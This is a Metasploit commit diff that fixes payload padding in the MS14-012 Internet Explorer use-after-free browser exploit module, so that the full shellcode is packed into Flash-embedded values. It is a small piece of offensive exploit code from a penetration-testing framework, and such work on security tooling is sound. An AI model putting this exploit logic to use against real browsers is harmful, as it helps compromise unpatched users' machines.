Land rapid7#3642 - Be sure which the full payload is used

Author: wchen-r7

modules/exploits/windows/browser/ms14_012_cmarkup_uaf.rb

@@ -108,7 +108,13 @@ def on_request_exploit(cli, request, target_info)
   def exploit_template(cli, target_info)
 
     flash_payload = ""
-    get_payload(cli,target_info).unpack("V*").each do |i|
+    padded_payload = get_payload(cli,target_info)
+
+    while padded_payload.length % 4 != 0
+      padded_payload += "\x00"
+    end
+
+    padded_payload.unpack("V*").each do |i|
       flash_payload << "0x#{i.to_s(16)},"
     end
     flash_payload.gsub!(/,$/, "")